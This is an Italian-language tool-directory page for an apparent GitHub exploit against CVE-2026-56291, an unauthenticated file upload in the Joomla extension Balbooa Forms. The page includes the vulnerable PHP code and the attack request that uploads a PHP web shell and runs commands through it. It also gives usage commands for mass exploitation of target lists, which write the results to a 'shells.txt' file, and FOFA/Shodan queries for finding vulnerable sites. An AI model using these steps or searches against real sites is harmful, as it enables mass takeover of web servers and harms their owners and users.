Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — Caricamento file non autenticato verso RCE tramite form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
Strumenti/GitHubGitHub/shinthink/cve-2026-56291
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — Caricamento file non autenticato verso RCE tramite form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

Vedi Repository
21 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-56291 — Exploit RCE di massa per Balbooa Forms su Joomla

Pre-Auth form.uploadAttachmentFile → Nessun CSRF → Upload PHP


Panoramica

CVE-2026-56291 è una vulnerabilità critica (CVSS 9.8) di caricamento arbitrario di file senza autenticazione nell'estensione Joomla Balbooa Forms (com_baforms) (< 2.4.1).

Il task frontend form.uploadAttachmentFile non chiama Session::checkToken() né esegue alcun controllo dei permessi. I file caricati usano direttamente l'estensione dell'attaccante: $fileName = $name . '.' . $ext. I file finiscono in images/baforms/uploads/form-{id}/ — direttamente eseguibili come PHP.

Versioni interessate

VersioneStato
1.0 – 2.4.0Vulnerabile
2.4.1+Corretta

CISA KEV: Aggiunto il 10 luglio 2026 — sfruttamento attivo confermato.


Meccanismo della vulnerabilità

Causa principale

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

Flusso dell'attacco

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

Installazione

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

Riferimenti

RisorsaLink
CISA KEVcisa.gov/known-exploited-vulnerabilities
Dettagli della correzionemysites.guru
RicercatorePhil Taylor

Non affiliato a Balbooa.

Scarica lo strumento